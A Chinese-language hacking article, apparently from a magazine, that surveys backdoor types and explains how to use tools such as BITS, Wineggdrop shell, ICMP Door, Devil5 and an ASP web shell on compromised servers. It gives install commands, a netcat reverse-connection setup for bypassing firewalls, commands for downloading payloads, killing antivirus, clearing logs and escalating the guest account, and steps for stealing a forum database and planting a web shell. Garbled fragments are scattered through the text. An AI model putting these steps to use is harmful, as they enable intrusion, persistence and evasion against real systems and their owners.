分類
後門可以按照很多方式來分類,標準不同自然分類就不同,為了便於大家理解,我們從技術方面來考慮後門程式的分類方法:
網頁後門
此類後門程式一般都是伺服器上正常 的web服務來構造自己的連線方式,比如非常流行的ASP、cgi腳本後門等。
網頁後門,網路上針對系統漏洞的攻擊事件漸漸少了,因為大家在認識到網路安全的重要性之後,最簡單卻又最有效的防護辦法:升級,都被大家所認同,所以系統漏洞在以後的歲月中存活的周期會越來越短,而從最近的趨勢來看,腳本漏洞已經漸漸取代了系統漏洞的地位,非常多的人開始研究起腳本漏洞來,sql注入也開始成為各大安全站點首要關注熱點,找到提升許可權的突破口,進而拿到伺服器的系統許可權。
asp、CGI、PHP這三個腳本大類在網路上的普遍運用帶來了腳本後門在這三方面的發展。
執行緒插入後門
利用系統自身的某個服務或者執行緒,將後門程式插入到其中,具體原理原來《黑客防線》曾具體講解過,感興趣的朋友可以查閱。這也是現在最流行的一個後門技術。
擴展後門
所謂的“擴展”,是指在功能上有大的提升,比普通的單一功能的後門有很強的使用性,這種後門本身就相當於一個小的安全工具包,能實現非常多的常見安全功能,適合新手使用————但是,功能越強,個人覺得反而脫離了後門“隱蔽”的初衷,具體看法就看各位使用者的喜好了。
c/s後門
和傳統的木馬程式類似的控制方法,採用“客戶端/服務端”的控制方式,通過某種特定的訪問方式來啟動後門進而控制伺服器。
root kit 6o f3H 3B
這個需要單獨說明,其實把它單獨列一個類在這裡是不太恰當的,但是,root kit的出現大大改變了後門程式的思維角度和使用理念,可以說一個好的root kit就是一個完全的系統殺手!後文我們講涉及到這方面,一定不會讓大家失望!
上面是按照技術做的分類,除了這些方面,正向連線後門、反向連線後門等分類也是很常見的,其實如何分類是編程者考慮的事,廣大的使用者就不用考慮那么多了,我們看重的,只是功能!
執行緒插入
首先我們來簡單解釋一下什麼是典型的"執行緒插入"後門:這種後門在運行時沒有進程,所有網路操作均播入到其他應用程式的進程中完成。也就是說,即使受控制端安裝的防火牆擁有“應用程式訪問許可權”的功能,也不能對這樣的後門進行有效的警告和攔截,也就使對方的防火牆形同虛設了!因為對它的查殺比較困難,這種後門本身的功能比較強大,是“居中家旅行、入侵攻擊”的必備品喔!
執行緒插入後門這類的典範就是國內提倡網路共享的小榕的BITS了,從它的推出以來,各類安全工具下載園地里BITS就高居榜首,非常多的朋友使用它的過程中感到了方便。
類型:系統後門
使用範圍:wind200/xp/2003
隱蔽程式:★★★★☆
使用難度:★★★☆☆
查殺難度:★★★★☆
BITS其實是Background Intelligent Transfer Servicer的縮寫,可以在不知不覺中實現另一種意義的典型的執行緒插入後門,有以下特點:進程管理器中看不到;平時沒有連線埠,只是在系統中充當臥底的角色;提供正向連線和反向連線兩種功能;僅適合用於windows 200/xp/2003。
運用舉例
首先我們用3389登錄上肉雞,確定你有SYSTEM的許可權,將BITS.DLL拷貝到伺服器上,執行CMD命令: 4 #R Br A
rundll32.exebits.dll,install
這樣就激活了BIST,程式用這個特徵的字元來辨認使用者,也就相當於你的密碼了,然後卸載:rundll32.exe BITS.dll,Uninstall
這是最簡單的使用,這個後門除了隱蔽性好外,還有兩大特點是非常 值得借鑑的:連線埠復用和正反向連線。雖然很多朋友經常聽到這兩個名詞,但並不了解它們,連線埠復用就是利用系統正常的TCP連線埠通訊和控制,比如80、139等,這樣的後門有個非常 大的好處就是非常 隱蔽,不用自己開連線埠也不會暴露自己的訪問,因為通訊本身就是系統的正常訪問!另一個是反向連線,這個很常 見,也是後門中一個經典思路,因為從伺服器上主動方問外邊是不被禁止的,很多很歷害的防火牆就怕這點!
BITS的正向連線很簡單,大家可以參考它的README,這種方式在伺服器沒有防火牆等措施的時候很管用,可以方便地連線,但是遇到有防火牆這樣的方式就不靈了,得使用下面的反向連線方式: 70 +g3l
在本地使用NC監聽(如:nc -l -p 1234)
用NC連線目標主機的任何一個防火牆允許的TCP連線埠(80/139/445……)
輸入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email] ^q/hQ , 4
目標主機的CMD將會出現NC監聽的連線埠2222,這樣就實現了繞過防火牆的功能了。
擴展後門
所謂的擴展後門,在普通意義上理解,可以看成是將非常多的功能集成到了後門裡,讓後門本身就可以實現很多功能,方便直接控制肉雞或者伺服器,這類的後門非常受初學者的喜愛,通常集成了檔案上傳/下載、系統用戶檢測、HTTP訪問、終端安裝、連線埠開放、啟動/停止服務等功能,本身就是個小的工具包,功能強大。
擴展後門Wineggdroup shell j;
類型:系統後門
使用範圍:win2000/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程度:★★★★☆
查殺難度:★★★★☆
這個後門是擴展後門中很有代表性的一個,功能這全面讓人嘆為觀止,它能實現如下比較有特色的功能:進程管理,可查看,殺進程(支持用進程名或PID來殺進程);註冊表管現(查看,刪除,增加等功能);服務管理(停止,啟動,枚舉,配置,刪除服務等功能)連線埠到程式關聯功能(fport);系統重啟,關電源,註銷等功能(reboot,poweroff,shutdown,logoff);嗅探密碼功能;安裝終端,修改終端連線埠功能;連線埠重定向功能(多執行緒,並且可限制連線者IP);HTTP服務功能(多執行緒,並且可限制連線者IP);Socd5代理功能(支持兩種不同方式驗證,可限制連線者IP);克隆賬號,檢測克隆賬戶功能(clone,checkclone);加強了的FindpassWord功能(可以得到所有登錄用戶,包括使用克隆賬戶遠程登錄用戶密碼);HTTP代理(完全匿名,支持oicq、 MSN、mirc等程式);其他輔助功能,http下載,刪除日誌,系統信息,恢復常用關聯,枚舉系統賬戶等。
當網路上剛推出這個後門的時候,非常多的人用它來替換自己原來使用的後門,一時間各處讚揚之聲迭起,但多為一些普通的打撈手的心聲,其實它和“後門”的原始定義是有出入的:一旦你需要實現越多的功能,那你的程式在執行、隱藏、穩定等方面就需要考慮非常多的問題,一個疏忽就會導致全盤皆敗,所以不建議將此後門用在需要非常隱蔽的地方。
運用舉例
在安裝後門前,需要使用它自帶的EditServer.exe程式對服務端進行非常詳細的配置,從10個具體配置中,包括了插入執行緒、密碼、IP登錄郵件通告等方面,不難看出它的功能是非常強大的,隱蔽性也很強,下面說幾個在入侵中常用的功能,相信經常玩入侵的朋友一定能發現它的強大之處:
Fport:列出進程到連線埠的列表,用於發現系統中運行程式所對應的連線埠,可以用來檢測常見的隱蔽的後門。
Reboot:重啟系統,如果你上傳並運行了其他後門程式,並需要重啟機器以便讓後門正常工作,那使用這個命令吧! Uz
Shell:得到一個Dos Shell,這個不多講了,直接得到伺服器或者肉雞上的cmd shell。
Pskill PID或程式名:用於殺掉特定的服務,比如防毒軟體或者是防火牆。
Execute程式:在後台中執行程式,比如sniffer等。http://ip/檔案名稱 保存檔案名稱:下載程式,直接從網上down一個後門到伺服器上。
Installterm連線埠:在沒有安裝終端服務的win2k服務版的系統中安裝終端服務,重啟系統後才生效,並可以自定義連線連線埠,比如不用3389而用其他連線埠。
StopService/StartService:停止或者啟動某個系統服務,比如telnet。
CleanEvent:刪除系統日誌。
Redirect:TCP數據轉發,這個功能是後門程式中非常出色的一個功能,可以通過某一連線埠的數據轉發來控制區域網路的機器,在滲透入侵的時候非常管用!
EnumService:列舉所有自動啟動的服務的資料,比如後門、木馬。
RegEdit:進入註冊表操作模式,熟悉註冊表的使用者終於在後門中找到了福音! !
Findpassword:得到所有登錄用戶密碼,比我們常用的findpass功能可強多了。
總體來講,Wineggdrop shell是後門程式中很出彩的一個,它經過作者幾次大規模的修改和升級,已經趨於穩定,功能的強大當然沒得說,但是由於功能太強大,被查殺和懷疑是難以避免的,所以很多人在使用Wineggdrop shell一段時間後就發現肉雞飛了,其實是很正常的事,我你出不用氣餒,其實用很簡單的方法就可以很好地提高它的隱蔽性,下文將有說明。
相對於Wineggdrop shell來說,獨孤劍客的winshell在功能上就不那么全面了,但是筆者推薦新手更多的使用winshell而不是Wineggdrop shell,因為winshell功能除了獲得一個shell以外,只加入了一些重啟、關閉伺服器的命令,功能相對簡單,但完全使用系統自帶的cmd來執行命令,對系統學習和掌握也是非常有幫助的!
Winshell和wolf這兩者都是國內早期頂尖的後門程式,程式的編制無疑是非常經典的,新手學習時使用這兩款後門一定能讓你明白很多系統相關東西,了解很多入侵思路和方法。
C/S後門
傳統的木馬程式常常使用C/S構架,這樣的構架很方便控制,也在一定程度上避免了“萬能密碼”的情況出現,對後門私有化有一定的貢獻,這方面分類比較模糊,很多後門可以歸結到此類中,比如較巧妙的就是ICMP Door了
類型:系統後門
使用範圍:win2000/xp/2003 2Z6
隱蔽程度:★★★★★
使用難度:★★★☆☆
危害程度:★★★★☆
查殺難度:★★★★★
這個後門利用ICMP通道進行通信,所以不開任何連線埠,只是利用系統本身的ICMP包進行控制安裝成系統服務後,開機自動運行,可以穿透很多防火牆——很明顯可以看出它的最大特點:不開任何連線埠~只通過ICMP控制!和上面任何一款後門程式相比,它的控制方式是很特殊的,連80連線埠都不用開放,不得不佩服務程式編制都在這方面獨特的思維角度和眼光!
運用舉例
這個後門其實用途最廣的地方在於突破網關後對區域網路計算機的控制,因為很多機密數據都是放在區域網路計算機上的,而控制區域網路計算機並不是我們想到位的商業網路進行入侵檢測,它的網路內部並不像我們常見的區域網路那樣非常容易入侵和控制,因為該公司本身涉及到一些網路安全的服務,所以區域網路個人計算機的防護是很到位的,在嘗試過很多後門後,最後ICMP Door幫我實現了成功的滲透區域網路!由此筆者開始愛上這個後門。
首先使用icmpsrv.exe -install參數進行後門的安裝,再使用icmpsend.exe IP進行控制,可以用:[http://xxx.xxx.xxx/admin.exe-hkfx.exe]方式下載檔案,保存在[url=file://\\system32\]\\system32\[/url]目錄下,檔案名稱為hkfx.exe,程式名前的“-”不能省去,使用[pslist]還可以列出遠程主機的進程名稱和pid,再使用[pskill id]就可以殺進程了,同樣,輸入普通cmd命令,則遠程主機也就執行了相關的命令。 ~HF1 ? %
這個後門是採用的c/s構架,必須要使用icmpsend才能激活伺服器,但是他也有自己的先天不足:後門依靠ICMP進行通訊,經過衝擊波的洗禮後,很少有伺服器還接受ICMP包了,很多都禁止掉了它,所以用它來控制伺服器不是一個好辦法,這也是我為什麼用它來控制區域網路計算機的原因了——區域網路很少有人禁止ICMP包吧?!
程式案例
海陽頂端
海陽頂端ASP木馬這是ASP腳本方面流傳非常廣的一個腳本後門了,在經過幾次大的改革後,推出了“海陽頂端ASP木馬XP版”、“海陽頂端ASP木馬紅粉佳人版”等功能強大、使用方便的後門,想必經常接觸腳本安全的朋友對這些都不會陌生。
類型:網頁木馬
使用範圍:支持ASP、WEB訪問
使用難度:★☆☆☆☆
危害程式:★★★☆☆
查殺難度:★★★☆☆
伺服器系統配置都相對安全,公開的系統漏洞存在的機會很少,於是腳本方面的漏洞就開始火起來。首先我們通過某種途徑獲得一個伺服器的頁面許可權(比如利用論壇上傳達室類型未嚴格設定、SQL注入後獲得ASP系統的上傳許可權、對已知物理路徑的伺服器上傳特定程式),然後我們可以通過簡單的上傳ASP程式或者是直接複製海陽項端的代碼,然後通過WEB訪問這個程式,就能很方便地查閱伺服器上的資料了,下面舉個簡單的便子(由於只是簡單的介紹,下文便子不會太難或者太普遍,希望大家理解)。
leadbbs2.77曾經風靡網路,它是個很典型的ASP論壇,禁止了很多可以SQL注入的寺方,但是很多傻瓜級別的網路管理員總是喜歡默認安裝,然後啟用論壇,我們只需要很簡單地在IE中輸入:WWW。***。COM/BBS/DATA/LEADBBS。MDB就能夠直接下載該論壇的資料庫了,而且沒有MD5加密喔!,我們直接找到管理員的賬戶和密碼,然後登錄論壇,到管理界面將論壇的“聯繫我們”、“幫助”等ASP檔案替換成我們的海陽項端代碼,然後執行GUEST許可權的CMD命令,方便的上傳/下載將定程式、遠程執行程式等,這樣一個隱藏的後門就建好了!取得伺服器的SYSTEM許可權就看大家自己的辦法了。
一般來講,海洋的功能是非常強大的,而且不容易被查殺(一個朋友採取的方式是:先利用某個腳本漏洞上傳網頁後門,再通過海洋上傳另一個後門到隱蔽的路徑,然後通過最後上傳的後門來刪除第一次上傳的海洋,這樣後門的存放路徑就可以放得非常深了,普通管理員是很難發現的),如果管理員覺得自己可能中了這裡邊樣的後門,可以利用論壇備份來恢復自己的頁面系統,再配合系統日誌、論壇日誌等程式檢查系統,發現可疑ASP檔案打開看看海洋是很好識別的,再刪除就可以了。
腳本方面的後門還有CGI和PHP兩面三刀大類,使用原理都差不多,這裡就不再多介紹,在黑防論壇也收錄了這三種後門,大家可以下載後自己研究。
devil5
類型:系統後門
使用範圍:win200/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程式:★★★★☆
查殺難度:★★★☆☆
同BITS一樣,Devil5也是執行緒插入式的後門,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用習慣定製連線埠和需要插入的執行緒,適合對系統有一定了解的使用都使用,由於是自定義插入執行緒,所以它更難被查殺,下面我們來看看它的使用。
道德使用它自帶的配置程式EDITDEVIL5.EXE對後門進行常規的配置,包括控制連線埠、插入執行緒、連線密碼、時間間隔等方面關鍵點是對插入執行緒的定製,一般設定成系統自帶的SVCHOST,然後運行後門就可以控制了。
我們用TELNET連線上去,連線的格式是:TELNET *** 定製的連線埠,它和其他後門不同之處在於連線後沒有提示的界面,每次執行程式也是分開的,必須要每次都有輸入密碼,比如我們丟掉了伺服器和管賬戶,可以激活GUEST後再將GUEST加到管理員許可權,記得每次執行命令後加上“>密碼”就可以了:net localgroup administrators guest /add >hkfx,然後你又可以控制伺服器了。
很明顯示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通過系統自帶連線埠通訊、執行命令比較麻煩,需要每次輸入密碼而且不回顯示輸入內容,很容易出錯。但是,它有自己的優勢:插入執行緒可以自已定製,比如設定IE的執行緒為插入的目標就比較難被查殺:自己提供了專門的查殺工具DELDEVIL5.exe,幫助防護者清理系統;而且它可以任意改名和綁定,使用靈活性上比BITS強……大家選擇哪能款就看自己的喜好了。
另外,PortLess BackDoor等工具也是此類的後門,功能強大,隱蔽性稍差,大家有興趣可以自己研究一下。
rootkit
如果說上面的後門程式都各有千秋、各有所長的話,它們和經典的root kit 一比簡直就是小巫見大巫了,那究竟什麼樣是root kit呢?
root kit出現於20世紀90年代初,在1994年2月的一篇安全諮詢報告中首先使用了root kit這個名詞。從出現至今,root kit 的技術發展非常迅速,套用越來越廣泛,檢測難度也越來越大。其中釷對SunOS和Linux兩種作業系統的root kit最多。
很多人有一個誤解,他們認為root kit 是用作獲得系統root訪問許可權的工具。實際上,root kit是攻擊都用來隱蔽自己的蹤跡和保留root訪問許可權的工具。通常,攻擊者通過遠程攻擊獲得root訪問許可權,進入系統後,攻擊者會在侵入的主機中安裝root kit,然後他將經常通過root kit的後門檢查系統是否有其他的用戶登錄,如果只有自己,攻擊者就開始著手清理日誌中的有關信息。通過root kit的嗅探器獲得其他系統的用戶和密碼之後,攻擊者就會利用這些信息侵入其他系統。
從*nix系統上遷移到windows系統下的root kit完全沿襲了這些“可怕”的功能!網路上常見的root kit 是核心級後門軟體,用戶可以通過它隱藏檔案、進程、系統服、系統驅動、註冊表鍵和鍵值、打開的連線埠以及虛構可用磁碟窨。程式同時也在記憶體中偽裝它所做的改動,並且隱身地控制被隱藏進程。程式安裝隱藏後門,註冊隱藏系統服務並且安裝系統驅動。該後門技術允許植入reDirector,是非常難以查殺的一個東東,讓很多網路管員非常頭疼!
著名後門
Windows Update最著名的後門程式,該算是微軟的Windows Update了。Windows Update的動作不外乎以下三個:開機時自動連上微軟的網站,將電腦的現況報告給網站以進行處理,網站通過Windows Update程式通知使用者是否有必須更新的檔案,以及如何更新。如果我們針對這些動作進行分析,則“開機時自動連上微軟網站”的動作就是後門程式特性中的“潛伏”,而“將電腦現況報告”的動作是“蒐集信息”。因此,雖然微軟“信誓旦旦”地說它不會蒐集個人電腦中的信息,但如果我們從Windows Update來進行分析的話,就會發現它必須蒐集個人電腦的信息才能進行操作,所差者只是蒐集了哪些信息而已。
